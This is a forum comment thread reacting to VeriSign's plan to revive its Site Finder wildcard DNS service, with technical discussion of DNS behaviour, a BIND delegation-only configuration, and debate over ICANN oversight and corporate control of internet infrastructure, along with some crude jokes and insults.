Verisign Considers Restarting Sitefinder

Rosco P. Coltrane writes "The Washington Post reports that VeriSign is considering reviving its infamous search engine. 'Site Finder was not controversial with users' says VeriSign's Tom Galvin, and VeriSign 'assured ICANN that it would give 60 to 90 days' warning to resolve any remaining technological problems.' Such as leaving the DNS service alone for example?"

Proof that some people never learn

[Quizo69]

Those who forget history are doomed to repeat it...

Re:Proof that some people never learn

[xpurple]

If it is put back in place, then the backlash will no doubt force them to take it down again.

It's just the way things go.

Re:Proof that some people never learn

Those that repeat truisms are also forced to repeat them.

Re:Proof that some people never learn

[RAMMS+EIN]

`` Those who forget history are doomed to repeat it...''

And, as jonadab put it, ``those who do study history are doomed to watch in frustration as it is unwittingly repeated by those who do not''

Re:Proof that some people never learn

[AKnightCowboy]

If it is put back in place, then the backlash will no doubt force them to take it down again.

Wow, and I was just starting to forget about how much I vehemently hated Verisign. It's always good when a company reminds you every once in awhile why you believe they're completely evil.

Just a reminder to the DNS admins:

zone "com" {
type delegation-only;
};

zone "net" {
type delegation-only;
};

Re:Proof that some people never learn

[lspd]

Speaking of backlash, it's hard to imagine a more interesting target for the next MyDoom type worm. Could a worm that tries to get the index page off random domains bring down VeriSign?

Not that I'm suggesting anything.

Re:Proof that some people never learn

[kimba]

Don't be surprised if they launch it in a different way.

For example, synthesising a pair of NS records for every non-existant domain rather than using wildcards. This will mean that this hack won't work, they are no longer using DNS "wildcards" per se, and all the concerns about protocol violation vanish.

Re:Proof that some people never learn

[dazed-n-confused]

Why would spammers want to hurt VeriSlime?

Re:Proof that some people never learn

[dotwaffle]

Look at it this way - we now have a cast iron case for making the Internet core facilties like DNS a non-profit zone, probably nationalising them under the US (I'm a Brit and I'd prefer this to it being corporate) scheme of doing things, or giving control to the UN. Maybe it's about time we saw the US taking up .us domains too... The overwhelming majority of .com's and .net's are in the US, while most UK addresses are in .uk so maybe this new organisational body would eduacte on the benefits of having segregated internet addresses...

Re:Proof that some people never learn

[glwtta]

Maybe it's about time we saw the US taking up .us domains too...

As soon as we figure out how to make everyone else use .them

Re:Proof that some people never learn

[WuphonsReach]

Those who forget history are doomed to repeat it...

More like, "well, even though people complained the first time, we'll bet that fewer people complain the second time, and by the third time there will be so few that we can freely ignore them anyway".

Re:Proof that some people never learn

synthesising a pair of NS records for every non-existant domain rather than using wildcards.

Methinks you overestimate the storage available to them.

IIRC, domain names can be up to 63 bytes in length - even limiting yourself to case-less alphanumerics, that's 36^62 combinations - or slightly over 3 yotta yotta yotta yotta bytes (that's 3 with 96 zeores on the end.) That's the equivalent of about 87 octillion 100GB hard drives.

And that's just for one TLD (so double it for .com and .net.)

Re:Proof that some people never learn

[ePhil_One]

If they were smart they would restrict themselves to wildcarding requests in the form of www.*.com

It would have bypassed a lot of the complaints concerning mail issues, though admitedly they would have to use a customized server to wildcard that way.

Re:Proof that some people never learn

[kimba]

Well, VeriSign use their own inhouse built nameserver called ATLAS.

Re:Proof that some people never learn

[iabervon]

Since that may not work, because they might actually delegate non-existant domains to themselves, people should be ready to ignore all records that point to IPs that reverse-resolve to a certain domain (so that, if they round-robin the IP address, you don't have to change things, and so that the IP address doesn't get killed forever). Sure, that cuts off anyone actually hosted by VeriSign, but they should know better, and could cut off VeriSign itself, but they really should know better. If a big ISP did this, VeriSign would probably take notice.

Re:Proof that some people never learn

[RLaager]

I'm probably feeding a troll, but I'll reply anyway... The records would obviously be synthesized on the fly like this:

1. The TLD servers would list NS records for one (or many) of VeriSign's servers for all non-existant domains.
2. The(se) VeriSign servers would then return the address(es) of the SiteFinder servers for any query they received.

Re:Proof that some people never learn

[Matrix9180]

Why do all virus writers suddenly have to be spammers?

Re:Proof that some people never learn

[ikkonoishi]

Nah they need to use .damnforeigners :)

Re:Proof that some people never learn

[NoMoreNicksLeft]

No matter what we do, it will only be worse. As a US citizen, I can say with some manner of expertise that my congressmen will find a way to fuck it up royally. Remember, these are the guys that think a "dot porn" and a "dot kids" TLD will actually fix anything. Even if it's managed by some federal bureau or dept (FCC?), they kowtow to congress and corps.

And don't even get me started on the UN.

I'm personally writing off the internet, and I don't have any expectations. If DNS dies completely, fine. I don't expect the web to be anything other than a stinky pile of feces, which it mostly is (80%), and definitely not email (110% smelly dung there).

Hope if you like, and prayer can't hurt. But stop lying to yourself that we can fix it. If you really want to be proactive, help me build a new internet. If my scheme seems stupid, then do freenet, or whatever. The internet is ours no longer.

Re:Proof that some people never learn

[dubl-u]

Why do all virus writers suddenly have to be spammers?

Maybe because if you don't give a fuck about other people, the future of the internet, or risking a little jail time, then it seems like a way to make money?

Re:Proof that some people never learn

[drakaan]

That's great, except for the fact that non-existent domains are supposed to return nxdomain answers. It was a great oversight not to limit the ability of wildcards in the tlds as part of the spec. There are other apps aside from mail and web browsers that use the internet and do name lookups...that much is known.

Unfortunately, now we have a problem with having to design future apps to check for and parse a stupid verisign web-page instead of just knowing "that domain doesn't exist".

Re:Proof that some people never learn

or giving control to the UN

This wouldn't be a good idea. The UN doesn't convey the sense of permanence that the internet does. It'd be best not to saddle the internet with the UN.

Re:Proof that some people never learn

[skorpion_of_ranax']

Bullshit... Notice in the lead-in: "'Site Finder was not controversial with users' says VeriSign's Tom Galvin". In other words, Verisign is not concerned with the complaints of knowledgable users. The general class of lusers doesn't know/care and, therefore, Verisign perceives they should be allowed to do what they want. Unfortunately, this is as expected from them...

Re:Proof that some people never learn

[pod]

Unfortunatelly that's not how DNS works. You, a user, requests www.xxx.com. Your ISPs DNS server gets the request, and can't find it in its cache. It queries the root DNS servers for the authoritative source for xxx.com. It then goes to that server and asks to resolve www.xxx.com. So Verisign will never see the www.

Re:Proof that some people never learn

[pod]

I thought it was 'those who study history will recognize when they repeat it'. I think it's been proven beyond any doubt that people rarely learn from past experience where it matters. And People (as in the royal 'we'), never do.

Re:Proof that some people never learn

[ePhil_One]

Umm, I think its safe to say that the server Verisign will say is athoritative for bogusdomain.com will be a Verisign server, unless some other idiot has set up their DNS server to wildcard all domain to their Sitefinder service. So when the query for MX records for bogusdomain.com come in it can simple reply with the NXDOMAIN at that point.

Now, I admit its been a while since I studied this, but doesn't the caching DNS server ask the root server "Where is some.long.domain.com" and the root server responds with "This server knows about domain.com, ask him" Since there is always a chance that the "Root" server does know the answer (given a private network). Otherwise you're generating a ton of needless traffic as you slowly reassemble the some.long.domain.com. Additionally, if I recall correctly, the root DNS servers answer "who is responsible for .com, .us, .tv, etc"

Bah!

Re:Proof that some people never learn

[Zeinfeld]

Speaking of backlash, it's hard to imagine a more interesting target for the next MyDoom type worm. Could a worm that tries to get the index page off random domains bring down VeriSign?

It happens every day, the number of recorded DoS attacks against the core DNS is over 1000. There are DDoS attacks happening on a regular basis.

MyDoom only took out SCO because they had a DNS server on a T1 link. It did not come close to taking out Microsoft.

Re:Proof that some people never learn

That's "backslash."

Re:Proof that some people never learn

[pod]

The parent was specifically speaking to responding to www.* requests, but replying NXDOMAIN otherwise. By the time it gets to looking up www. on Verisign's server, it's too late, Verisign already acknowledged the existance of the domain.

Re:Proof that some people never learn

I think it's been proven beyond any doubt that people rarely learn from past experience where it matters.

Well I don't know if it matters or not, but from my experience I learned that that's mostly true for people who think people rarely learn from past experience where it matters.

What you think about humans in general says more about you and perhaps your culture than about humans in general.

Re:Proof that some people never learn

[pod]

Oh yeah? Then how come we see so much history repeated? It's not like no one studies it.

Anyhow, WTF am I doing replying to an AC.

Outsourcing

You think we might be able to outsource VeriSign to India?

Re:Outsourcing

Its there already www.sitefindersucks.com we just need something there now

Re:Outsourcing

Do you think India would take them?

Re:Outsourcing

[Puchku]

Yum.. Us Indians salivating at the thought of biting into juciy verisign. Thanks you very much...

Why is a profit-company in such a central role?

[ggvaidya]

This is .org and .com! When does Verisign's lease expire? Can ICANN turn over the license to someone else?

Re:Why is a profit-company in such a central role?

[ron_ivi]

Because people let them. If more people pointed to alternative root servers, they wouldn't have as much power.

Re:Why is a profit-company in such a central role?

[ron_ivi]

Or even set up your own TLD

Re:Why is a profit-company in such a central role?

[bartjan]

How would choosing an alternate root server fix brokenness in the .com and .net tld's?

They still point to Verisign's gTLD-server.net's nameservers for the .com and .net domains, so using these alternate roots won't solve this problem.

Of course, you could set up your own alternate .com or .net TLD. Good luck in getting the full and updated list of all registered .com and .net domains and their nameservers :)

Re:Why is a profit-company in such a central role?

[BiggerIsBetter]

If they go ahead with this, I suspect we will find out...

On a similar note, how about an industry wide boycott of all Verisign certificates. The next round of certificate-extortion goes through someone else, and uninstall their root certs too - I'd hardly call them "trusted" after pulling this junk again.

Re:Why is a profit-company in such a central role?

[Llarian]

As has been pointed out time and time again on NANOG and other operational mailing lists, DNS hijacking is still DNS hijacking, regardless of how noble the intent is.

From an operations standpoint, the impacts of Sitefinder are unfortunatly minimal now. Most of the major operational issues brought up when it was first released have been solved by either Verisign or by various application developers (ISC and other DNS developers) and are no longer an issue.

While I and many other people involved in operations agree that Sitefinder is a horrible idea ethically, nobody is helping their case with histronics and ad hominem attacks on Verisign's business practices, regardless of how true they are. All that does is gives Verisign more fuel for their "technocratic elite" arguments in press releases.

If you really want to fight this, tone down some of the passion and write to ICANN with legitimate concerns about the service and its effects. Crying foul about slimy business practices with no supporting evidence and a lot of sound and fury is a good way to make people who might be swayed agree with Verisign's claims of being attacked unjustly.

Re:Why is a profit-company in such a central role?

I especially like the spam-filter angle that CrackMonkey suggested. "Keep people who don't know DNS from mailing you or seeing your web site -- get less mail from morons."

brilliant

Re:Why is a profit-company in such a central role?

The parent poster never suggested fixing the .com domains. He was merely refering to the grandparent posting asking how this for-profit company got so much power. If people formed communities by saying "hey, let's all use some nonprofit's domain naming system instead", Verisign's power would be lessened.

Sure, they could still trash .com, but who would care?

Re:Why is a profit-company in such a central role?

[RAMMS+EIN]

``While I and many other people involved in operations agree that Sitefinder is a horrible idea ethically, nobody is helping their case with histronics and ad hominem attacks on Verisign's business practices, regardless of how true they are.''

I do not oppose to Sitefinder alone, but to VeriSign as a whole. I think it's a Bad Thing to have a corporation in such a dominant position. I don't trust corporations. Sitefinder just proves me right. I don't just want Sitefinder to go away, I want VeriSign to go away. Down with corporate control! The Internet to the People!

Re:Why is a profit-company in such a central role?

[NormalVisual]

Verisign doesn't run .org, PIR does. This page details the registrars for the most common TLDs.

Re:Why is a profit-company in such a central role?

[zerocool^]

From an operations standpoint, the impacts of Sitefinder are unfortunatly minimal now. Most of the major operational issues brought up when it was first released have been solved by either Verisign or by various application developers (ISC and other DNS developers) and are no longer an issue.


Except for things like this:

Option 1 -
MailServer: "OK, you sent me mail from this domain, let's reverse look it up to see if it actually exists... nslookup domain... OK, so I'm gonna go ahead and reject that spam."

Option 2 -
MailServer "OK, you sent me mail from this domain, let's reverse look it up to see if it actually exists... nslookup domain... OK, it exists, let's look it up by IP to make sure it actually is the domain you're from... nslookup IP... ok, I'm going to go ahead and reject this, and either stop sending spam, or configure your reverse zones".

Option 3 -
MailServer: "OK, you sent this, I'm going to check and see if you're valid... nslookup domain... nslookup IP... fantastic! Welcome to my humble abode, and don't worry about that mail, it's been taken care of".

Or, with SiteFinder, Option 4 -
MailServer: "I hate my life. Are you a valid domain? Yes? No? I don't care, I'm barely here. My existance is meaningless, my spirit is broken. I think I'm going to cat /dev/urandom to a file for a while."

~Will

Re:Why is a profit-company in such a central role?

.org isn't run by Verisign.

Re:Why is a profit-company in such a central role?

[_Sprocket_]

On a similar note, how about an industry wide boycott of all Verisign certificates. The next round of certificate-extortion goes through someone else, and uninstall their root certs too - I'd hardly call them "trusted" after pulling this junk again.

I agree with the general idea. A company who resorts to this kind of behavior is hardly someone that can be trusted. This mindset affects their DNS operations today. What other areas of their business are next?

Having said that - who is a suitable sub (it's not Thawte)?

Re:Why is a profit-company in such a central role?

[senzafine]

Unfortunately it's to late for that. Whoever controls TLD for .com controls the power for high traffic domains.

Re:Why is a profit-company in such a central role?

[hta]

Correction: It's .net and .com. .org is handled by PIR, which is a subsidiary of ISOC. ISOC is a not-for-profit.

Re:Why is a profit-company in such a central role?

[ajagci]

If you really want to fight this, tone down some of the passion and write to ICANN with legitimate concerns about the service and its effects.

It would be bad even if it had no effects. Verisign is tasked with running the domain name system, not changing it.

But, in fact, it does have an effect, and a big one: it precludes an efficient market in the kinds of functionality Verisign is adding. They are using the trust that has been placed in them to create a business for themselves that few others can compete in. The proper way in which to do this is to create a standard by which users themselves can choose what to do when a page wasn't found.

Crying foul about slimy business practices with no supporting evidence

What more evidence do you want than the actions they have taken in plain sight? Unilaterally changing the behavior of the domain name system for corporate gain is, by itself, a slimy business practice.

Re:Why is a profit-company in such a central role?

[dubl-u]

I don't trust corporations. Sitefinder just proves me right. I don't just want Sitefinder to go away, I want VeriSign to go away. Down with corporate control! The Internet to the People!

I don't know if you've been inside one, but it turns out corporations are made up of people. And it's a crazy thing, but so are governments. Everywhere you look, it's people, people, people. And as far as I can tell, none of 'em are perfect.

The problem isn't corporations as such; it's ICANN giving control of the big TLDs without sufficient oversight. Outsourcing the operation makes sense, but allowing Verisign to do whatever they please doesn't. ICANN should be making sure that none of their vendors are doing stuff that harms the internet, outrages the people who make it go, or inconveniences the zillions of people who rely on it.

Whether it's a coroporation or a government department doing the work, you still need oversight, and that seems lacking here.

Re:Why is a profit-company in such a central role?

[macdaddy]

Correct me if I'm wrong but I read somewhere that Verislime owns many of the "alternate" non-Verislime CAs out there. So even if you don't buy Verislime certs, you may very well be buying Verislime certs anyways. Can anyone confirm this?

I've long since wondered why a non-profit like the FSF or ISC didn't create an alternate CA. OpenCA.org or OpenCert.org. I see that openca.org is already used for some sort of CA project but I don't know exactly what. If browsers like the Mozilla clan, Safari, Opera, and others honored OpenCA's certs then eventually MS's IE would have to as well. Actually MS would probably get in the busines with their own CA at that point but still... OpenCA could charge a small fee, just enough to maintain a good CA system and pay some good staffers. It could be like $50/cert. That would be excellent IMHO.

Re:Why is a profit-company in such a central role?

[RAMMS+EIN]

I agree with your entire post, but there are still some arguments to be made against corporations being in control of crucial infrastructure.

Most corporations have running a profit as their major goal. This is likely to conflict with the best interests of the customers; they may be getting a sub-obtimal product, and at any rate will usually be charged more than the break-even cost.

If the Internet were a product entirely created by some company, I would find it totally reasonable that that company would have complete control over it and could charge customers whatever it wanted. However, VeriSign did not create the Internet, nor did it create DNS. It's more like the responsibility for DNS was kind of thrown into their lap, and now the entire Internet depends on a system which is at the mercy of their whims - which, as I pointed out in the previous paragraph, might well run contrary to our interests.

This still wouldn't be such a major issue for me if the Internet didn't play such a central role in modern day society. I also might not have voiced my criticism if VeriSign had behaved. However, they have taken unilateral and harmful action before, and now, despite global criticism, they are going to do the exact same thing. (That, BTW, reminds me of another, similar issue - but that's too far off-topic.)

Re:Why is a profit-company in such a central role?

[BiggerIsBetter]

That's not a bad idea at all. I think most ISPs would rather buy their certs from FSF or similar. The only difficulty would be getting Microsoft to ship certificate updates to the masses.

It's interesting that you mention Microsoft. I was thinking how this would impact them, as suddenly their Internet Explorer DNS redirects won't work - I can't see them being happy about Versign stealing their customer's eyes, so to speak.

Re:Why is a profit-company in such a central role?

[Gabriele+Capone]

You can already get certificates that work with current browsers for $50.

Re:Why is a profit-company in such a central role?

[Gabriele+Capone]

http://www.ev1servers.net/english/quickssldetails. asp

Re:Why is a profit-company in such a central role?

[TekPolitik]

When does VeriSign's lease expire?

As soon as geeks can get organised enough to tell VeriSign and ICANN to take a long walk off a short pier and set up a replacement root registry. VeriSign only has a contract with ICANN, and despite the involvement of the USDoC, ICANN has authority to manage this only for as long as system administrators around the world will tolerate it. If they were to collect together to designate a new root, then the new root could be operational tomorrow (or near enough to tomorrow).

The VeriSign database isn't even protected by copyright in the United States because it's a mechanical compilation of facts (Feist), but even if it were, if enough registrars were to give their data over to the new registry, the rest would have to (otherwise registration through the rest would be of lower value), and presto, no more need for the VeriSign roots.

This threat to reintroduce SiteFinder should be more than enough to give momentum to such a move.

Re:Why is a profit-company in such a central role?

[TekPolitik]

I don't know if you've been inside one, but it turns out corporations are made up of people.

What the OP was referring to, of course, was for-profit corporations, and therein lies the problem. A profit purpose appeals to the basest of motivational factors - greed. It is likely that the greedier a person is, the more power they will wind up with in a corporation. And if greed is their primary driver, there is more chance of them (and hence the corporation) doing something sleazy, unethical, destructive or even illegal, than if their primary motive were, for example, altruism.

Re:Why is a profit-company in such a central role?

I've long since wondered why a non-profit like the FSF or ISC didn't create an alternate CA.
I don't know if I trust Paul Vixie much more than Verisign - create *BL's have tons of people freely contribute, then turn it pay only access. You want BIND support, contract with these people who aren't us ;) ISC == Nominum What about the "pay to get security updates about BIND before the general public fiasco". one blurb hereUse our buddies/related companies for mailing list management or we mark you as a spammer.
Accussations and some evidence that they were blackholing routes from the antispammers down under. Alot of questionable stuff, but its bured because of the "good will" from BIND... He seems very dictatorial from what I have seen.
No thanks...

RMS on the other hand, would probably just want it to be called the GNU/DNS system :)

Re:Why is a profit-company in such a central role?

[dubl-u]

A profit purpose appeals to the basest of motivational factors - greed. It is likely that the greedier a person is, the more power they will wind up with in a corporation. And if greed is their primary driver, there is more chance of them (and hence the corporation) doing something sleazy, unethical, destructive or even illegal, than if their primary motive were, for example, altruism.

This is true in the short term, but if that were the only important factor, then most companies would be doing sleazy, unethical, destructive, and illegal things most of the time.

But it turns out that they don't. Why? Because it's in the long-term interest of any company to behave in a way that keeps their customers coming back. Verisign here feels like they can trick and manipulate their customer, ICANN. They got beaten down on it once, and hopefully ICANN will smack 'em again if needed.

But if Verisign gets away with it and keeps getting contract renewals, then it's not really Verisign who deserves the blame, it's ICANN, the outfit that is picking them. And note that ICANN is a non-profit corporation that's responsible to the US Government. So if we rule out for-profit corporations, non-profits, and governments, it's not clear to me who y'all are proposing should run the registry.

Re:Why is a profit-company in such a central role?

[dubl-u]

This is likely to conflict with the best interests of the customers; they may be getting a sub-obtimal product, and at any rate will usually be charged more than the break-even cost.

As compared to what? As a general rule, market-based solutions get you better goods for the same money (or lower prices for the same goods) than other solutions.

Of course, if you wanted to start a not-for-profit registrar and bid against Verisign, I'm sure that ICANN would be glad to take your bid.

This still wouldn't be such a major issue for me if the Internet didn't play such a central role in modern day society.

However, they have taken unilateral and harmful action before, and now, despite global criticism, they are going to do the exact same thing.

They took that action and ICANN whacked them. Now they're saying that they'll try again. Hopefully ICANN will whack them again. Ideally, ICANN, a non-profit corporation, will give the contract to somebody else.

Re:Why is a profit-company in such a central role?

[macdaddy]

Really? Do tell. No seriously, I need to look into them in the very near future. :)

Re:Why is a profit-company in such a central role?

[macdaddy]

I think it would be a worthwhile venture. The kicker would of course be MS and IE. However is support for the cert was created in all the core server software via a project OpenSSL then it would I think it eventually be supported by MS. I mean if you as a server admin can create certs that are supported by MUAs for IMAP or POP-TLS or the various SMTP AUTH mechanisms, #2 and lower browsers, SFTP apps, SSH apps, and all the other everyday apps that use CAs that we don't even realize then I think it would eventually have to be supported in IE. To not support it at that point would be a bad PR move IMHO.

I can't imagine MS being happy about the loss of revenue from Sitefinder. It would surprise me in the least if they didn't create a solution within IE itself to block Sitefinder or at least intercept its pages and redirect back to MSN.

Re:Why is a profit-company in such a central role?

That's ok... now the spam originates on a Verisign domain. So sue them! Again and again and again!

And microsoft does this anyway to all windows user

[freerecords]

When you type in a wrong address at the moment which doesn't exist, you are automatically taken to either a site search engine, which is pure crap.. or to the microsoft auto search.. (talking for users on School networks, with Windows terminals) which offers the option to use the great Hotmail (Spam Central), Shopping (at ridiculous prices, from the company which could afford to give us all we want free) etc.

You would think...

[TehHustler]

...that they would learn from past mistakes. But no, of course not.

The problem is, are ICANN going to back down this time and let it slide, or are they going to continue to give Verisign hell over this, and pressure them, as they should definitely do?

Are we likely to see another backlash from users and network admins?

And will there be the same sort of media coverage that basically gave Verisign quite a bad bit of PR for 2 weeks.

It seems like they have sneaked this out again with the minimal amount of fanfare in an attempt to try and stifle the opposition, but when you have so many people mistyping domains everyday, you cant really expect it to go unnoticed and not to piss people off.

Re:You would think...

[ivan37]

There will be another backlash although obviously to a lesser extent. The biggest backlash will come from admins who will once again blacklist the corresponding Site Finder IP.

The fun will start when Verisign starts not liking large ISPs blocking their users from accessing Site Finder and initiate a cat-and-mouse game of having Site Finder resolve to a ton of different changing IPs that the admins will have to keep up with.

Re:You would think...

Well, in that case I think the Internet Death Penalty for Verisign would be called for...

Re:You would think...

[gclef]

Actually, rather than ban the SiteFinder IP, ISPs will probably just accelerate their plans to move to bind 9.2.3, so they can use the "delegation-only" option, which solves the problem once and for all.

If you just ban the SiteFinder IP, Verisign can move it..and then you're just playing whack-a-mole. If you mark .com and .net as delegation-only zones, then bind will drop the SiteFinder responses as invalid, no matter what IP Verisign responds with.

Re:You would think...

I keep forgetting why Verisign can't just return NS records for nonexisting domains and have them point to a nameserver which then returns the Sitefinder IP address. That would circumvent a delegation-only restriction, wouldn't it?

Re:You would think...

[gclef]

Yes, it would. But, that forces Verisign to build a lot of infrastructure, which they don't have in place right now. Right now, they're just using the gtld-servers, which can handle a lot of load, and the wildcard isn't adding any load to that. If they give the system NS records and point them somewhere else (likely the only way to get around delegation-only), then they have to build up a set of SiteFinder DNS servers to handle that query load, which will be an infrastructure and operational expense they weren't planning on. They had to build the webserver cluster, sure, but the cluster they had was clearly not up to the task (kept crashing), and now they'll have to add a nameserver cluster...all this for questionable revenue and a lot of bad blood in the community. The more expensive we make this, the less likely it is to happen.

I'm also secretly hoping that Paul Vixie & co will figure out a way to filter that step, once it comes to it.

By the way, this sort of arms race of action-filter is exactly what ICANN is terrified of. The last thing they want to see is an all-out war over the DNS...it causes instability. This is why it's at least somewhat likely that ICANN will stop Verisign. I can't guarantee that they will act, but they *really* don't want to see an arms race occur.

Re:You would think...

[morganew]

Pretty sure that VeriSign no longer uses BIND.

[snippet from VeriSign website]

Server Software
VeriSign runs special name server software tuned to the requirements of authoritative name servers rather than recursive name servers. With this software, the VeriSign name servers boast exceptional performance, sustaining query rates an order of magnitude greater than the performance of a standard BIND name server.

VeriSign name servers support the latest DNS protocol enhancements to insure maximum security, features, and flexibility at all times.

Re:You would think...

[orthogonal]

...that they would learn from past mistakes. But no, of course not.

They have.

What they've learned is that outrage, like everything else, is a limited quantity.

You and I can't spend afford eight hours a day, five days a week to watch and warn against Verisign.

We have other things to worry about: Belkin using routers to spam, New York's Livingston County Social Services Commission letting confidential data get posted on the web, Johm Ashcroft eviscerating the Bill of Rights.

But Verisign can trigger our outrage the first time around, back down in the face of our massed complaints, and then, like a spider in its hole, wait patiently until the time is ripe to strike again.

Just like the Department of Justice and the proposed "Patriot II" law; they withdrew it after furious opposition, wait a while, and then got key provisions passed after everyone had relaxed.

Verisign is banking that each time around, they'll be a few less people able or willing to work up any outrage, until only a small minority objects -- a small minority that can be derided with a dismissive comment about "tin foil hats".

This is why we need organizations like the EFF and EPIC (and the ACLU): so the we have someone in out corner who, like a Verisign employee, is paid five days a week to watch for and counter these outrages.

Re:You would think...

[AKnightCowboy]

Pretty sure that VeriSign no longer uses BIND.

It doesn't matter what Verisign uses, your ISP (or you if you're running your DNS) configures your local DNS server with the option which prohibits types other than delegation records in the .com and .net zones. Verisign could be running Microsoft's DNS server for all we care as long as it talks the standard DNS protocols.

Re:You would think...

[Lukey+Boy]

Excuse me sir! Did you just imply that Microsoft DNS services adhere to the standard protocols? ;-)

Not controversial

[ralmeida]

'Site Finder was not controversial with users'

It wasn't controversial at all. Everybody agree it was a bad idea.

Re:Not controversial

It wasn't controversial at all. Everybody agree it was a bad idea.

This is sort of like your electric company coming along one day and saying they'll be switching from 60hz to 85hz to provide you with better service.

Re:Not controversial

[vranash]

On the minus I'll have to replace all my power adapters with 110v 85Hz versions, but on the plus side I can run all my old monitors at 60 Hz without it coming out fuzzy :)

-- vranash

Mirror

[Ddalex]

Fast mirror here. Enjoy the Net exploatation !

Re:And microsoft does this anyway to all windows u

[Tet]

When you type in a wrong address at the moment which doesn't exist, you are automatically taken to either a site search engine, which is pure crap.. or to the microsoft auto search.

There's a difference. Microsoft only do it at the application layer, with a particular browser that they provide. If you don't like it (and I can't see why anyone would), you can always switch to one of the many alternatives. Verisign's site finder operates at the DNS level. It's not as if you can choose to not use DNS, or switch to another name service.

the sooner

[narkotix]

they take .com and .net out of verisign's hands the better. Its just unfortunate that this will misinform new people AND generate more needless traffic because of the returned page. Did the search page ever have preferences to certain websites? or was it truly independent? If i typed in server software would it bring up xxx penis extensions because some idiot put in metatags or would it bring up true results?

Re:the sooner

[boneshintai]

the sooner they take .com and .net out of verisign's hands the better.

You misspelled "we".

Re:the sooner

hehe true..i stand corrected. Also the fact that it should have read new users as well!

Re:And microsoft does this anyway to all windows u

[ggvaidya]

And firebird^H^H^H^Hfox does it for google ... it could be argued that's even worse than Microsoft, since there you get shot off on an I'm Feeling Lucky, while microsoft gives you a list of close matches and lets you choose one. I've had too many times when I mistyped a URL, got shot off to another page entirely, and then had to go back and do a "google URL" to find what I was looking for.

Also, M$'s way sends you back to a Microsoft page - which is expected, since MS has a search service (along with one copy of every single other web application). But Mozilla choose Google fairly arbitrarily - why not use Yahoo? Or Wikipedia? And anyone who argues "it's the #1 search option" gets a free copy of IE, the #1 browser, from your good friends at Monopolysoft ;)

Re:And microsoft does this anyway to all windows u

At least what microsoft does affects the operation of one specific browser, the Microsoft Internet Explorer. And yes, Microsoft gives you the ability to change this behavior from the Advanced Tab of the Internet Settings by Choosing "Do not Search from the Address Bar".

On the other hand, what Verisign does, affects the operation of any application that relies on DNS to connect anywhere.

Re:And microsoft does this anyway to all windows u

[cgranade]

True, but that is a browser thing. It doesn't break well-written applications that don't use MSIE (isn't that redundant?), and doesn't affect Linux/Mac users at all. This, on the other hand breaks applications through no fault of the original developers, forces ads down ppls throats with no means of changing it, and exploits a publicly trusted position.

Re:And microsoft does this anyway to all windows u

[freerecords]

That is fair enough.. but what about those of us unfortunate enough to be on a school network where we can't install a single thing (not even Mozilla Firefox, bird whatever..) And where we can't access settings. The other point was that for home users, many of whom do not know how to use the configuration to turn off M$ autosearch, it is just as bad as the Verisign is.

Comical Ali at work..

[Channard]

'Site Finder was not controversial with users'

And in other news, the US forces were crushed in Iraq, Mars Beagle did not go missing and has been transmitting pictures for many days, and these aren't the droids you're looking for.

Re:Comical Ali at work..

Sad but true...
http://news.bbc.co.uk/2/hi/middle_east/34 75679.stm

Yet another car bomb in Bagdad city..

"And in other news, the US forces were crushed in Iraq"

Your loss of reality realy isn't funny,... even though the mods say you are....

Re:Comical Ali at work..

[merdark]

the US forces were crushed in Iraq

Nah, instead the US forces are trying blood letting. You know, a few lives here, a few lives there. Hip hip hurray for rightous occupation.

Re:And microsoft does this anyway to all windows u

[gowen]

When you type in a wrong address at the moment which doesn't exist, you are automatically taken to either a site search engine, which is pure crap

Thats on the Web.

But DNS is used for more than web look ups. If DNS returns spurious results for gethostbyname(), a typo in a SSH command, or nntp request will be seriously bjorked.

I've no problem with Firefox (or IE) sending me to a search engine when I try to connect to a typo-ed web page: this is a reasonable policy to set at the application level

Re:And microsoft does this anyway to all windows u

[freerecords]

Unfortunately, as can be seen with Zeitgeist. Windows users on MSIE dominate the market. The majority of these the software auto searching for them is as bad, or actually as noticeable, as the DNS doing it.

Re:And microsoft does this anyway to all windows u

[mr_mozz]

Thats a different issue entirely. Having a *browser* point you to a search engine is all well and good. You can modify this behaviour to suit yourself. But if the *internet* starts doing this stuff for you... well, it's not a pretty picture.

MyDoom.D

[dew-genen-ny]

And in other news, techno soothsayers predict that verisign is going to be the target of a large DDos attack in the near future......

That's what we get with corporations

[daem0n1x]

That's what we get by having corporations managing the Internet infraestructure instead of a public service. Some people talk about censorship, but if the corporations actually have the nerve to do something like this, whow long does it take until censorship sets in?

"Not controversial with users"

[heironymouscoward]

The full paragraph from the internal Verisign report reads:

"Studies in Outer Mongolia showed that our Site Finder service was not controversial with users of the Trans-Himalaya Yak Courier Service. Everyone else on the planet, including Arawoyo Pnu (34) from Upper Amazonia, found the service both useless and obnoxious. We therefore recommend renaming the Site Finder service to 'Yak Finder' in order to better exploit the Outer Mongolian market."

Re:And microsoft does this anyway to all windows u

[cgranade]

Understood. I'm not trying to defend MS, but merely point out that with MSIE, there is an alternative in most cases. Whether or not this alternative is pursured, well, that's another matter. At anyrate, my only point is that it is possible to avoid MSIE, whereas it isn't possible to avoid Verisign short of: 1) using pure IP addresses w/o domain names, 2) using alternate DNS servers, or 3) raise enough bloody hell to give Verisign a run for their money.

Re:And microsoft does this anyway to all windows u

[twoshortplanks]

The complete wrongness of the way Verisign are going about it aside, I don't see why getting a search engine when you enter an incorrect domain is a bad thing in your web browser. I'd argue it's a feature. Sure, it could be a bit better labeled, but it's not like you were going to see anything else of use, was it?

Learning lessons from Hitler

[gbulmash]

The main tenet of Nazi propaganda was that the public is more likely to believe a big lie than a small one.

Seems to be a philosophy the PR flacks for VeriSign and SCO subscribe to wholeheartedly.

"You have to license your Linux installation from us." "Everybody likes Sitefinder." "I was singing in a church choir in Cucamonga when the murder happened." "I won't cum in your mouth."

Sheesh.

Re:Learning lessons from Hitler

They must have learnt it from their politicians.

Re:Learning lessons from Hitler

And look where it got Bush!

Keep on arguing about the puppet show, kids! Picking one of two identical sides and defending it to the death is sure to fix *everything*!

Re:Learning lessons from Hitler

[sik0fewl]

The main tenet of Nazi propaganda was that the public is more likely to believe a big lie than a small one.

Seems to be a philosophy the PR flacks for VeriSign and SCO subscribe to wholeheartedly.

Ah ha. I knew SCO's tactics seemed strangely familiar. I'm surprised I never realized this before, thank you for pointing this out.

Obviously VeriSign saw how well SCO was doing and decided to try it out, too.

Let's just hope they both end up like Hitler: dead.

Re:Learning lessons from Hitler

Didn't Darl say that he was going to license Poland?

Re:Learning lessons from Hitler

[dacarr]

Godwin's Law is almost appropriate here. Almost.

Take a wild guess?!

[Killjoy_NL]

Come on I dare ya.

